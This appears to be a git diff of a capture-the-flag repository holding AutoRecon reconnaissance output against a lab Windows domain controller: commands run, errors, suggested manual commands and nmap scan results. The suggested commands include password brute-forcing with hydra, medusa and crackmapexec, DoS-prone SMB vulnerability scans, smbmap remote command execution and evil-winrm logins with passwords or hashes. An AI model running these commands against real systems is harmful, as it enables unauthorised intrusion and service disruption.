nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131
feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt"
curl -sSikf http://10.129.243.131:80/.well-known/security.txt
curl -sSikf http://10.129.243.131:80/robots.txt
curl -sSik http://10.129.243.131:80/
nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131
whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1
wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131
impacket-getArch -target 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131
impacket-rpcdump -port 135 10.129.243.131
enum4linux -a -M -l -d 10.129.243.131 2>&1
nbtscan -rvh 10.129.243.131 2>&1
nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131
smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
smbmap -H 10.129.243.131 -P 139 2>&1
nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131
smbmap -H 10.129.243.131 -P 445 2>&1
nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131
impacket-rpcdump -port 593 10.129.243.131
nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131
smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1
smbmap -H 10.129.243.131 -P 139 -R 2>&1
smbmap -H 10.129.243.131 -P 445 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1
smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1
smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1
dig -p 53 -x 10.129.243.131 @10.129.243.131
dig AXFR -p 53 @10.129.243.131
nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131
nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131
```

56
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Errors.md Normal file
View File

@@ -0,0 +1,56 @@
```
[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9).
[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131
[-] Error Output:
[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9).
[-] Command: dig AXFR -p 53 @10.129.243.131
[-] Error Output:
[*] Service scan wkhtmltoimage (tcp/80/http/wkhtmltoimage) ran a command which returned a non-zero exit code (1).
[-] Command: wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png
[-] Error Output:
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
Loading page (1/2)
[> ] 0%
[==============================> ] 50%
[==============================> ] 50%
Warning: Failed to load https://ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css (ignore)
Error: Failed to load https://fonts.googleapis.com/css?family=Open+Sans%7CMaven+Pro:500, with network status code 3 and http status code 0 - Host fonts.googleapis.com not found
Error: Failed to load https://cdnjs.cloudflare.com/ajax/libs/prefixfree/1.0.7/prefixfree.min.js, with network status code 3 and http status code 0 - Host cdnjs.cloudflare.com not found
libva info: VA-API version 1.17.0
libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so
libva info: Found init function __vaDriverInit_1_17
libva error: /usr/lib/x86_64-linux-gnu/dri/iHD_drv_video.so init failed
libva info: va_openDriver() returns 1
libva info: Trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so
libva info: Found init function __vaDriverInit_1_8
libva info: va_openDriver() returns 0
[============================================================] 100%
Rendering (2/2)
[> ] 0%
[===============> ] 25%
[============================================================] 100%
Done
Exit with code 1 due to network error: HostNotFoundError
[*] Service scan SMBClient (tcp/139/netbios-ssn/smbclient) ran a command which returned a non-zero exit code (1).
[-] Command: smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1
[-] Error Output:
[*] Service scan DNS Reverse Lookup (tcp/53/domain/dns-reverse-lookup) ran a command which returned a non-zero exit code (9).
[-] Command: dig -p 53 -x 10.129.243.131 @10.129.243.131
[-] Error Output:
[*] Service scan DNS Zone Transfer (tcp/53/domain/dns-zone-transfer) ran a command which returned a non-zero exit code (9).
[-] Command: dig AXFR -p 53 @10.129.243.131
[-] Error Output:
```

221
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Manual Commands.md Normal file
View File

@@ -0,0 +1,221 @@
```bash
[*] domain on tcp/53
[-] Use dnsrecon to bruteforce subdomains of a DNS domain.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt
[-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt"
[*] msrpc on tcp/135
[-] RPC Client:
rpcclient -p 135 -U "" 10.129.243.131
[*] netbios-ssn on tcp/139
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/389
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt"
[*] microsoft-ds on tcp/445
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Lookup SIDs
impacket-lookupsid '[username]:[password]@10.129.243.131'
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/3268
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt"
[*] wsman on tcp/5985
[-] Bruteforce logins:
crackmapexec winrm 10.129.243.131 -d '<domain>' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt'
[-] Check login (requires credentials):
crackmapexec winrm 10.129.243.131 -d '<domain>' -u '<username>' -p '<password>'
[-] Evil WinRM (gem install evil-winrm):
evil-winrm -u '<user>' -p '<password>' -i 10.129.243.131
evil-winrm -u '<user>' -H '<hash>' -i 10.129.243.131
[*] msrpc on tcp/49667
[-] RPC Client:
rpcclient -p 49667 -U "" 10.129.243.131
[*] msrpc on tcp/49673
[-] RPC Client:
rpcclient -p 49673 -U "" 10.129.243.131
[*] msrpc on tcp/49695
[-] RPC Client:
rpcclient -p 49695 -U "" 10.129.243.131
[*] msrpc on tcp/49843
[-] RPC Client:
rpcclient -p 49843 -U "" 10.129.243.131
[*] domain on tcp/53
[-] Use dnsrecon to bruteforce subdomains of a DNS domain.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_subdomain_bruteforce.txt
[-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dnsrecon_default_manual.txt
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.129.243.131:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.129.243.131/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.129.243.131 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.129.243.131/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.129.243.131 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.129.243.131:80 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.129.243.131:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_wpscan.txt"
[*] msrpc on tcp/135
[-] RPC Client:
rpcclient -p 135 -U "" 10.129.243.131
[*] netbios-ssn on tcp/139
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=139 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 139 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/389
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:389 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_all-entries.txt"
[*] microsoft-ds on tcp/445
[-] Bruteforce SMB
crackmapexec smb 10.129.243.131 --port=445 -u "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -p "/usr/share/seclists/Passwords/darkweb2017-top100.txt"
[-] Lookup SIDs
impacket-lookupsid '[username]:[password]@10.129.243.131'
[-] Nmap scans for SMB vulnerabilities that could potentially cause a DoS if scanned (according to Nmap). Be careful:
nmap -vv --reason -Pn -T4 -sV -p 445 --script="smb-vuln-* and dos" --script-args="unsafe=1" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_vulnerabilities.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_vulnerabilities.xml" 10.129.243.131
[*] ldap on tcp/3268
[-] ldapsearch command (modify before running):
ldapsearch -x -D "<username>" -w "<password>" -H ldap://10.129.243.131:3268 -b "dc=example,dc=com" -s sub "(objectclass=*)" 2>&1 | tee > "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_all-entries.txt"
[*] wsman on tcp/5985
[-] Bruteforce logins:
crackmapexec winrm 10.129.243.131 -d '<domain>' -u '/usr/share/seclists/Usernames/top-usernames-shortlist.txt' -p '/usr/share/seclists/Passwords/darkweb2017-top100.txt'
[-] Check login (requires credentials):
crackmapexec winrm 10.129.243.131 -d '<domain>' -u '<username>' -p '<password>'
[-] Evil WinRM (gem install evil-winrm):
evil-winrm -u '<user>' -p '<password>' -i 10.129.243.131
evil-winrm -u '<user>' -H '<hash>' -i 10.129.243.131
[*] domain on udp/53
[-] Use dnsrecon to bruteforce subdomains of a DNS domain.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t brt 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_subdomain_bruteforce.txt
[-] Use dnsrecon to automatically query data from the DNS server. You must specify the target domain name.
dnsrecon -n 10.129.243.131 -d <DOMAIN-NAME> 2>&1 | tee /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dnsrecon_default_manual.txt
```

4
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Patterns.md Normal file
View File

@@ -0,0 +1,4 @@
Identified Architecture: 64-bit
Identified HTTP Server: Microsoft-IIS/10.0

82
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - All TCP Ports.md Normal file
View File

@@ -0,0 +1,82 @@
```bash
nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml 10.129.243.131
adjust_timeouts2: packet supposedly had rtt of 9072738 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9072738 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9146057 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9146057 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9198674 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9198674 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9287917 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of 9287917 microseconds. Ignoring time.
Nmap scan report for 10.129.243.131
Host is up, received user-set (0.046s latency).
Scanned at 2023-10-28 13:45:20 CEST for 873s
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Slandovia Energy
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-28 12:58:41Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49674/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49695/tcp open unknown syn-ack ttl 127
49843/tcp open unknown syn-ack ttl 127
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=10/28%OT=53%CT=%CU=%PV=Y%G=N%TM=653CF7B9%P=x86_64-pc-l
OS:inux-gnu)ECN(R=N)T1(R=N)T2(R=N)T3(R=N)T4(R=N)U1(R=N)IE(R=N)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 59m59s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 25314/tcp): CLEAN (Timeout)
| Check 2 (port 10793/tcp): CLEAN (Timeout)
| Check 3 (port 25536/udp): CLEAN (Timeout)
| Check 4 (port 25523/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-10-28T12:59:18
|_ start_date: N/A
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 ... 30
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct 28 13:59:53 2023 -- 1 IP address (1 host up) scanned in 887.79 seconds
```

51
LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Port Scans/PortScan - Top 100 UDP Ports.md Normal file
View File

@@ -0,0 +1,51 @@
```bash
nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131
```
[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt):
```
# Nmap 7.93 scan initiated Sat Oct 28 13:45:06 2023 as: nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml 10.129.243.131
Nmap scan report for 10.129.243.131
Host is up, received user-set (0.093s latency).
Scanned at 2023-10-28 13:45:07 CEST for 1811s
Not shown: 98 open|filtered udp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/udp open domain? udp-response ttl 127
| fingerprint-strings:
| DNS-SD:
| _services
| _dns-sd
| _udp
|_ local
123/udp open ntp? script-set
| ntp-info:
|_ receive time stamp: 2023-10-28T12:52:08
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CF493%P=x86_64-pc-linux-gnu%r(DNS
SF:-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_udp\x0
SF:5local\0\0\x0c\0\x01")%r(Citrix,1E,"\x1e\0\x81\x01\x02\xfd\xa8\xe3\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
